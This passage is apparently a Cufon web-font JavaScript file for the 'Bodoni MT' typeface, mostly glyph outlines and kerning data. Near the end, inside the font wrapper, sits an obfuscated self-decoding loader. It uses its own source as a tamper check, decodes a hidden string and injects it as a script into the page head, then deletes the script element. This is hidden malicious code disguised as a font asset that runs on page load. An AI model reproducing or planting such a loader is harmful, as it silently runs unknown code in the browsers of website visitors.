34v-1,-21,35,-24,35,-2v2,7,-7,13,-7,17","w":173,"k":{"y":21,"u":18,"o":21,"e":18,"a":15,"A":18,";":12,":":12,".":33,",":30}},{"d":"53,-102v-53,-23,-35,-112,29,-112v16,0,32,5,46,15v6,-4,5,-14,16,-13r1,54r-7,0v-10,-60,-96,-63,-102,-11v-4,36,64,33,88,45v55,27,33,129,-37,129v-16,0,-32,-6,-48,-18v-7,4,-9,13,-20,13r0,-59r7,0v9,31,29,54,62,56v36,3,70,-42,41,-73v-13,-15,-58,-18,-76,-26","w":173,"k":{".":9,",":6}},{"d":"76,-214r17,0r0,296r-17,0r0,-296","w":168},{"d":"104,-8v47,5,57,-26,63,-61r8,0r-3,69r-161,0r0,-8r120,-194v-55,-1,-101,-5,-102,49r-8,0r4,-57r150,0r0,6r-122,196r51,0","w":190},{"d":"13,-60v0,-51,67,-94,97,-45r0,-97r-29,0r0,-8v21,0,42,1,60,-2r0,204r21,0r0,8v-18,0,-34,0,-52,2v-1,-8,2,-20,-1,-26v-23,56,-96,17,-96,-36xm71,-4v45,4,50,-71,30,-103v-6,-9,-16,-13,-27,-13v-30,0,-26,24,-26,65v0,34,0,49,23,51","w":169,"k":{"y":6,"w":3,"v":12}},{"d":"144,-119r81,111r26,0r0,8r-105,0r0,-8r35,0r-60,-83r-65,83r41,0r0,8r-83,0r0,-8r31,0r71,-90r-76,-104r-26,0r0,-8r104,0r0,8r-34,0r54,75r60,-75r-36,0r0,-8r76,0r0,8r-30,0","w":260,"k":{"O":15,"G":12,"C":12}},{"d":"14,-210r75,0r46,149r45,-149r73,0r0,8r-31,0r0,194r31,0r0,8r-98,0r0,-8r32,0r-1,-197r-62,205r-8,0r-63,-205r0,197r32,0r0,8r-71,0r0,-8r31,0r0,-194r-31,0r0,-8","w":269},{"d":"34,51v13,0,17,27,28,7v5,-8,19,-38,25,-53r-62,-120r-18,0r0,-8r75,0r0,8r-24,0r44,86r38,-86r-27,0r0,-8r55,0r0,8r-20,0v-28,59,-54,135,-87,186v-10,17,-40,16,-40,-6v0,-7,6,-14,13,-14","w":173,"k":{"o":12,"g":12,"e":9,"d":9,"c":9,"a":6,".":47,",":44}},{"d":"75,-6v40,0,40,-60,38,-109r-25,0r0,-8r56,0r0,115r21,0r0,8r-52,2v-1,-9,2,-22,-1,-29v-9,19,-24,29,-44,29v-54,0,-35,-69,-38,-117r-23,0r0,-8r53,0r0,83v0,22,-1,34,15,34","w":173},{"d":"202,-115r-46,119r-5,0r-36,-85r-34,85r-5,0r-50,-119r-20,0r0,-8r73,0r0,8r-21,0r32,77r35,-85r5,0r35,85r29,-77r-23,0r0,-8r49,0r0,8r-18,0","w":226,"k":{"h":3,"d":3,".":41,",":39}},{"d":"148,-115r-59,120r-4,0r-60,-120r-19,0r0,-8r77,0r0,8r-24,0r41,83r40,-83r-23,0r0,-8r51,0r0,8r-20,0","w":173,"k":{"q":12,"o":12,"e":12,"d":9,"c":12,"a":12,".":50,",":47}},{"d":"94,-214v34,8,3,63,3,91r-6,0r-12,-72v0,-13,5,-19,15,-19xm36,-214v15,-1,18,14,15,29r-12,62r-6,0r-12,-72v0,-13,5,-19,15,-19","w":130},{"d":"90,-214r-73,219r-17,0r73,-219r17,0","w":89},{"d":"46,-168v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm61,-125r0,117r20,0r0,8r-72,0r0,-8r21,0r0,-107r-21,0r0,-8v18,0,37,1,52,-2","w":86,"k":{"v":9}},{"d":"68,2v-52,2,-27,-72,-33,-117r-27,0r0,-8r27,0r0,-33v10,0,21,0,31,-2r0,35r37,0r0,8r-37,0r0,77v-10,39,33,36,39,10r7,0v-5,20,-20,30,-44,30","w":120},{"d":"28,74v42,-4,37,-52,28,-86v2,-27,20,-45,46,-54v-24,-9,-44,-27,-46,-54v8,-35,15,-82,-28,-87r0,-5v32,3,58,30,59,60v-7,35,-15,80,28,83r0,6v-66,6,-4,89,-44,120v-10,12,-25,19,-43,22r0,-5","w":153},{"d":"43,-87v-10,0,-20,-10,-19,-20v-1,-10,9,-20,19,-20v11,0,20,10,20,20v0,10,-9,20,-20,20xm43,4v-10,0,-20,-10,-19,-20v-1,-10,9,-20,19,-19v11,-1,20,9,20,19v0,10,-9,20,-20,20","w":86},{"d":"20,-68v0,-58,27,-115,61,-144r9,0v-59,67,-56,224,0,291r-9,0v-36,-37,-61,-86,-61,-147","w":103},{"d":"83,-112v-24,10,-22,64,-21,104r26,0r0,8r-82,0r0,-8r25,0r0,-107r-25,0r0,-8r56,-2r0,30v7,-20,19,-30,33,-30v11,-1,20,9,20,20v0,10,-6,17,-16,16v-17,2,-10,-16,-16,-23","w":120,"k":{"y":-6,"u":-9,"t":-9,"s":-3,"r":-9,"p":-6,"n":-9,"m":-9,"k":3,"j":-6,":":3,".":29,",":27}},{"d":"211,-105v0,54,-46,110,-98,110v-52,0,-97,-57,-97,-107v0,-57,46,-112,99,-112v50,0,96,58,96,109xm167,-114v0,-60,-4,-92,-53,-92v-54,0,-54,37,-54,103v0,57,1,100,53,100v53,0,54,-47,54,-111","w":226,"k":{"Y":27,"X":21,"W":12,"V":18,"T":-6,"A":24,".":18,",":15}},{"d":"48,-8r0,-194r-33,0r0,-8r103,0r0,8r-33,0r0,90r90,0r0,-90r-32,0r0,-8r102,0r0,8r-33,0r0,194r33,0r0,8r-102,0r0,-8r32,0r0,-96r-90,0r0,96r33,0r0,8r-103,0r0,-8r33,0","w":260},{"w":78},{"d":"151,-113v-5,29,-25,-10,-33,6v29,43,-19,80,-69,68v-8,-2,-24,10,-23,18v18,32,117,-21,117,49v0,61,-117,77,-128,20v2,-18,10,-19,27,-30v-38,-6,-33,-62,6,-63v-47,-19,-20,-82,27,-82v15,0,28,6,38,16v8,-10,16,-16,25,-16v7,1,14,6,13,14xm97,-90v0,-21,-5,-29,-23,-29v-22,0,-22,11,-22,34v0,30,-4,40,23,40v28,0,22,-12,22,-45xm134,35v0,-31,-52,-17,-83,-17v-26,17,-19,57,24,57v29,0,59,-15,59,-40","k":{"r":-9,"o":3,"l":3,"g":-3,"e":3,".":15,",":9}},{"d":"199,-202r0,207r-6,0r-139,-207r0,194r36,0r0,8r-75,0r0,-8r31,0r0,-194r-33,0r0,-8r80,0r98,147r0,-139r-35,0r0,-8r75,0r0,8r-32,0","w":243,"k":{"A":15,".":15,",":12}},{"d":"29,-8r0,-194r-23,0r0,-8v17,0,42,1,53,-2r0,204r22,0r0,8r-75,0r0,-8r23,0","w":86,"k":{"y":3,"w":6}},{"d":"106,-201v-41,-18,-45,30,-41,78r29,0r0,8r-29,0r0,107r26,0r0,8r-80,0r0,-8r23,0r0,-107r-26,0r0,-8r26,0v-3,-48,22,-85,61,-89v25,-3,44,37,15,40v-17,1,-19,-22,-4,-29","w":103,"k":{"o":6,"l":12,"k":12,"?":-29,".":12,",":9,"!":-29," ":-49}},{"d":"140,-154v0,26,-24,44,-47,50v29,7,51,22,51,52v0,33,-30,57,-66,57v-36,0,-64,-24,-65,-56v-1,-31,27,-48,53,-54v-28,-4,-47,-22,-48,-49v0,-28,30,-51,60,-51v33,0,62,21,62,51xm79,-198v-25,0,-28,16,-29,50v0,26,10,40,29,40v23,0,29,-18,29,-47v0,-27,-6,-43,-29,-43xm46,-47v1,29,7,44,32,44v27,0,33,-15,33,-46v0,-34,-11,-51,-33,-51v-25,0,-32,21,-32,53"},{"d":"95,-21v-18,34,-79,34,-79,-6v0,-27,27,-41,79,-43v-2,-26,6,-50,-21,-48v-46,-5,-4,35,-35,37v-10,1,-13,-7,-14,-14v2,-20,28,-30,55,-30v58,0,45,46,45,95v0,20,9,24,18,11r4,0v-3,31,-50,31,-52,-2xm66,-10v24,0,32,-24,29,-53v-32,2,-45,5,-48,31v0,12,8,22,19,22","k":{"y":9,"w":9,"v":15,"t":3,"p":3}},{"d":"54,-168v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm20,75v22,-5,19,-25,19,-61r0,-129r-28,0r0,-8v19,0,43,1,58,-2v-5,80,22,196,-49,207v-24,4,-40,-32,-14,-34v14,-1,14,13,9,23v0,3,1,4,5,4","w":100},{"d":"191,-24r-169,-72r0,-15r169,-71r0,18r-146,61r146,61r0,18","w":213},{"d":"18,-79r67,0r0,26r-67,0r0,-26","w":103},{"d":"84,-65v0,58,-27,115,-62,144r-8,0v59,-67,56,-224,0,-291r8,0v36,37,62,86,62,147","w":103},{"d":"78,-206v50,0,77,52,44,91v-17,20,-72,70,-88,89v28,-1,71,3,92,-3r5,-29r7,0r-5,58r-117,0r0,-19v19,-27,95,-73,89,-125v9,-54,-70,-67,-74,-18v0,12,9,0,15,2v9,-1,15,8,15,16v0,8,-7,16,-16,16v-14,0,-24,-15,-23,-30v1,-26,27,-48,56,-48"},{"d":"133,-5v43,-2,58,-18,58,-73r0,-124r-34,0r0,-8r75,0r0,8r-33,0r0,127v4,60,-25,76,-77,80v-106,8,-65,-117,-73,-207r-31,0r0,-8r100,0r0,8r-33,0r0,124v0,45,4,75,48,73","w":243,"k":{"A":24,".":29,",":27}},{"d":"62,-191v-3,41,-18,76,-15,128r-7,0v2,-56,-9,-86,-14,-129v-1,-10,9,-21,18,-20v11,0,19,10,18,21xm44,4v-10,1,-20,-10,-20,-20v0,-11,10,-19,20,-19v10,0,19,10,19,19v0,10,-9,20,-19,20","w":86},{"d":"197,-153v0,51,-51,61,-111,57r0,88r34,0r0,8r-104,0r0,-8r33,0r0,-194r-33,0r0,-8v76,2,180,-17,181,57xm158,-156v0,-44,-28,-48,-72,-46r0,98v46,3,72,-5,72,-52","w":209,"k":{"o":15,"e":15,"a":15,"A":41,".":65,",":62}},{"d":"43,4v-10,0,-20,-10,-19,-20v-1,-10,9,-20,19,-19v11,-1,20,9,20,19v0,10,-9,20,-20,20","w":86},{"w":78},{"d":"76,-205v78,2,85,125,35,173v-23,23,-50,38,-83,43r0,-6v44,-7,76,-40,79,-90v-34,42,-94,-2,-94,-49v0,-35,27,-72,63,-71xm78,-198v-34,4,-29,25,-31,75v-3,56,40,58,62,26v1,-40,8,-105,-31,-101"},{"d":"144,-100v0,44,-27,105,-66,105v-87,0,-86,-205,1,-211v39,-2,65,62,65,106xm79,-3v42,0,31,-79,31,-128v0,-45,-10,-67,-31,-67v-45,0,-33,80,-33,131v0,43,11,64,33,64"},{"d":"224,-105v0,64,-41,105,-111,105r-99,0r0,-8r33,0r0,-194r-33,0r0,-8r99,0v71,-3,111,40,111,105xm184,-115v0,-71,-28,-94,-100,-87r0,194r27,0v66,3,73,-41,73,-107","w":243,"k":{"Y":30,"W":21,"V":27,"A":27,".":27,",":24}},{"d":"107,-3v36,4,44,-25,41,-67r-36,0r0,-8r109,0r0,8r-31,0v3,49,-38,74,-79,75v-55,2,-96,-55,-96,-110v0,-76,81,-140,147,-93v5,2,7,-11,17,-9r2,57r-8,0v-9,-38,-29,-56,-61,-56v-51,0,-53,35,-53,89v0,74,-4,108,48,114","w":226,"k":{".":12,",":9}},{"d":"101,-118v-41,0,-41,60,-39,110r20,0r0,8r-72,0r0,-8r22,0r0,-107r-22,0r0,-8v18,0,37,1,52,-2v1,9,-2,23,1,30v11,-21,25,-32,45,-32v52,-1,35,68,38,119r24,0r0,8r-75,0r0,-8r20,0r0,-78v0,-20,2,-32,-14,-32","w":173,"k":{"y":6,"v":12,"u":3}},{"d":"43,-87v-10,0,-20,-10,-19,-20v-1,-10,9,-20,19,-20v11,0,20,10,20,20v0,10,-9,20,-20,20xm41,-34v44,6,34,61,-3,85r-5,-5v19,-16,28,-32,28,-45v0,-34,-11,7,-26,4v-9,-2,-16,-8,-16,-18v0,-12,10,-23,22,-21","w":86},{"d":"28,-214v14,-1,18,14,15,29r-11,62r-7,0r-12,-72v0,-13,5,-19,15,-19","w":57},{"d":"41,-34v44,6,34,61,-3,85r-5,-5v19,-16,28,-32,28,-45v0,-34,-11,7,-26,4v-9,-2,-16,-8,-16,-18v0,-12,10,-23,22,-21","w":86},{"d":"81,5v-76,-3,-83,-129,-33,-176v24,-22,50,-37,83,-41r0,10v-47,5,-78,36,-79,84v35,-40,93,2,93,50v0,35,-31,75,-64,73xm112,-66v5,-64,-34,-78,-62,-38v-1,47,-7,106,31,101v28,-4,28,-22,31,-63"},{"d":"158,-65v0,51,-66,94,-96,45r0,93r25,0r0,9r-76,0r0,-9r21,0r0,-188r-23,0r0,-8v18,0,37,0,53,-2v1,8,-2,19,1,25v23,-54,95,-18,95,35xm100,-5v24,-4,24,-21,24,-56v0,-36,2,-54,-23,-59v-29,4,-39,24,-39,59v0,35,10,53,38,56","w":173,"k":{"y":6,"w":6,".":12,",":9}},{"d":"162,40r-164,0r0,-16r164,0r0,16","w":160},{"d":"50,-8r0,-194r-35,0r0,-8r106,0r0,8r-34,0r0,194r34,0r0,8r-106,0r0,-8r35,0","w":136},{"d":"83,-153v-7,12,23,46,-5,50v-26,-4,2,-38,-4,-49v-9,3,-35,48,-46,15v-6,-18,38,-14,42,-22v-4,-8,-49,-5,-42,-23v0,-7,5,-12,12,-12v12,-6,30,37,35,26v-1,-13,-21,-46,3,-46v30,0,-4,41,5,49v7,-4,39,-49,46,-15v4,19,-44,12,-43,21v7,9,46,2,42,22v0,6,-5,12,-11,12v-11,3,-24,-27,-34,-28"},{"d":"27,-172v8,-54,105,-38,105,13v0,25,-17,41,-51,50v38,2,57,21,60,54v5,61,-111,85,-121,21v-1,-10,5,-19,16,-19v8,0,16,8,15,16v2,10,-10,15,-14,19v20,23,70,18,70,-32v0,-42,-20,-57,-58,-53v-10,1,-10,-11,-1,-10v31,5,52,-9,50,-44v9,-44,-40,-51,-54,-28v11,3,19,31,-2,31v-9,1,-16,-9,-15,-18"},{"d":"22,-182r169,72r0,15r-169,71r0,-18r147,-61r-147,-60r0,-19","w":213},{"d":"78,-41v0,-41,49,-110,86,-110v16,0,22,9,27,22r4,-17r25,-4r-33,122v0,6,5,13,12,12v36,-2,66,-57,66,-102v0,-56,-44,-96,-101,-96v-78,0,-134,73,-134,149v0,71,51,126,122,125v63,-1,106,-37,126,-87r9,0v-17,54,-70,95,-136,96v-77,1,-136,-61,-136,-138v0,-83,67,-153,148,-153v66,0,112,44,112,107v1,51,-36,110,-87,110v-26,0,-25,-22,-21,-44v-23,30,-43,44,-61,44v-17,1,-28,-18,-28,-36xm120,-24v36,-4,65,-57,65,-97v0,-12,-8,-22,-20,-22v-27,0,-63,72,-63,97v0,12,7,23,18,22","w":294},{"d":"15,-150r51,0r14,-64r16,0r-14,64r69,0r14,-64r16,0r-14,64r32,0r0,16r-35,0r-13,61r48,0r0,16r-51,0r-13,64r-17,0r14,-64r-69,0r-13,64r-17,0r14,-64r-32,0r0,-16r35,0r13,-61r-48,0r0,-16xm148,-134r-69,0r-12,60r69,0","w":213},{"d":"22,-148r169,0r0,16r-169,0r0,-16xm22,-75r169,0r0,16r-169,0r0,-16","w":213},{"d":"56,-8r0,-194r-33,0r0,-8r103,0r0,8r-33,0r0,194r33,0r0,8r-103,0r0,-8r33,0xm149,-210r79,0r0,8r-32,0r-70,72r102,122r20,0r0,8r-103,0r0,-8r36,0r-84,-103r87,-91r-35,0r0,-8","w":253,"k":{"y":18,"w":21,"v":24,"u":12,"o":12,"e":12,"O":18,"G":21,"C":21}},{"d":"75,-214v54,1,54,109,-1,110v-54,-1,-53,-109,1,-110xm75,-109v20,-7,15,-22,15,-64v0,-24,-5,-36,-15,-36v-18,4,-15,19,-15,48v0,31,-3,46,15,52xm233,-214r-155,224r-14,0r154,-224r15,0xm222,-100v54,1,56,111,-1,110v-54,-1,-53,-109,1,-110xm222,5v21,-7,15,-21,15,-64v0,-24,-5,-35,-15,-35v-18,0,-15,20,-15,47v0,30,-4,48,15,52","w":296},{"d":"12,-62v0,-50,61,-87,97,-50v10,10,16,23,17,41r-79,0v1,48,-5,68,28,68v22,0,36,-13,44,-39r7,0v-4,28,-23,46,-51,46v-35,0,-63,-30,-63,-66xm71,-120v-23,0,-26,19,-24,42r45,0v5,-22,1,-42,-21,-42","w":136,"k":{"z":-6,"y":3,"x":-3,"v":6,"p":-6,"g":-6,"b":-3}},{"d":"98,-71r54,63r15,0r0,8r-74,0r0,-8r21,0r-35,-42r-38,42r24,0r0,8r-57,0r0,-8r23,0r43,-47r-50,-60r-17,0r0,-8r76,0r0,8r-21,0r31,38r35,-38r-24,0r0,-8r57,0r0,8r-24,0","w":173,"k":{"o":3,"e":4,"d":3,"c":3}},{"d":"112,-206r0,142r26,0r0,-23r8,0r0,56r-8,0r0,-25r-26,0r0,48r23,0r0,8r-80,0r0,-8r27,0r0,-48r-74,0r0,-8v35,-66,65,-113,89,-142r15,0xm82,-64r-1,-108v-18,26,-39,62,-64,108r65,0"},{"d":"134,-65r-66,0r-22,57r39,0r0,8r-76,0r0,-8r29,0r76,-206r5,0r73,206r28,0r0,8r-99,0r0,-8r34,0xm70,-73r61,0r-30,-84","w":226,"k":{"y":21,"w":21,"v":30,"u":15,"p":6,"Y":47,"W":39,"V":42,"U":27,"T":18,"Q":9,"O":9,"G":6,"C":6}},{"d":"93,-206r0,198r37,0r0,8r-102,0r0,-8r36,0r0,-183r-36,0v0,-4,-1,-10,5,-8v23,0,43,-3,60,-7"},{"d":"124,-212v6,53,-44,35,-85,38r-2,58v49,-17,101,10,101,56v0,37,-35,66,-72,65v-27,0,-49,-17,-50,-41v-1,-20,32,-23,31,-2v2,11,-8,14,-14,19v20,27,79,14,70,-36v4,-53,-37,-67,-72,-50v-6,-22,-1,-72,5,-93v14,-13,78,9,81,-14r7,0"},{"d":"17,-103v0,-75,75,-147,137,-92v7,-6,3,-19,16,-17r0,62r-7,0v-7,-38,-27,-56,-57,-56v-46,0,-47,36,-47,100v0,65,0,96,48,103v33,-3,52,-26,61,-60r7,0r-2,64v-13,1,-10,-13,-18,-17v-61,57,-138,-13,-138,-87","w":190,"k":{".":-12,",":-14}},{"d":"159,-40v5,-50,-12,-75,-68,-68r0,100r33,0r0,8r-103,0r0,-8r33,0r0,-194r-33,0r0,-8v73,6,187,-24,187,49v0,35,-29,43,-67,51v37,8,61,24,60,71v-1,28,9,35,31,29r0,8v-37,14,-77,-5,-73,-38xm168,-162v0,-45,-35,-41,-77,-40r0,87v47,2,77,2,77,-47","w":243,"k":{"y":15,"w":15,"v":24,"u":9,"o":12,"e":9,"a":3,"Y":24,"W":18,"V":24,"U":18,"T":3,"Q":6,"O":6,"G":3,"C":3}},{"d":"205,-56v0,77,-112,52,-190,56r0,-8r33,0r0,-194r-33,0r0,-8v74,5,180,-22,183,51v1,26,-22,40,-57,50v43,7,64,24,64,53xm159,-161v5,-46,-32,-42,-74,-41r0,88v45,2,79,0,74,-47xm164,-58v0,-48,-32,-50,-79,-48r0,98v48,2,79,1,79,-50","w":223,"k":{"U":12,"A":18,".":12,",":9}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+285-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("WZo}iQRP*x-]W(+^lQ13XZX-27R}oQ-]27v3*x.eoq)N$kPz*}1&*h-M$+4fiPoiv+o`x,&u.qllqhlE=}B=|e1^,+R)xQ.$#2+}l[o=X+rp*2.-:zd3#Pd=l#Sr$#{e#QBQ:Z18;(Pj`+HdH(4u:#{G.74^v3r7=1-vWM`09(`-,3q+~h.{`#qhHfXzYeRriZ+PW(XzW,Bj;#SN=h}zYeSNih}rYQB+iQlP*(Be;xX]ozJein+r*n`-~[P^*x$?$zJp*kPp2zuV:el[l}r]W#)?;k?]W}r]=Z13o2d+i1r]$7-&|n{d=Qq4oxB=YQRpi2Briqr]=ndN2(Jjie.)Yz&=YQRd=QqNiZ1Mi}r]$7-&S{(hG1ZnXvWY`R:;9.,#Hqx2$o*i=l~|udzMf+Qe?j8AN&]prB3kP}7[4JE^)-0V|(4A2(Jr$2v+~ZqN$7-]=[qNlZ+]o}r]$7-&|n{d=Qq4oxBMi7JklxBP*xJe2(JMi7})`#=P2(4BRhR=YMfP2(J=WzffY7f]lZqkl(dNi7RdlZ+pizJ?i[RPiQ1&o,fjoQ-3Wh&j;Zr^W3&jWxli$}&j2qP-=1&j22PjW(fu")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":156,"face":{"font-family":"Bodoni MT","font-weight":400,"font-stretch":"normal","units-per-em":"320","panose-1":"2 7 6 3 8 6 6 2 2 3","ascent":"256","descent":"-64","x-height":"4","bbox":"-7.3374 -222 303 83.2676","underline-thickness":"15.9375","underline-position":"-16.0938","unicode-range":"U+0020-U+007E"}}));
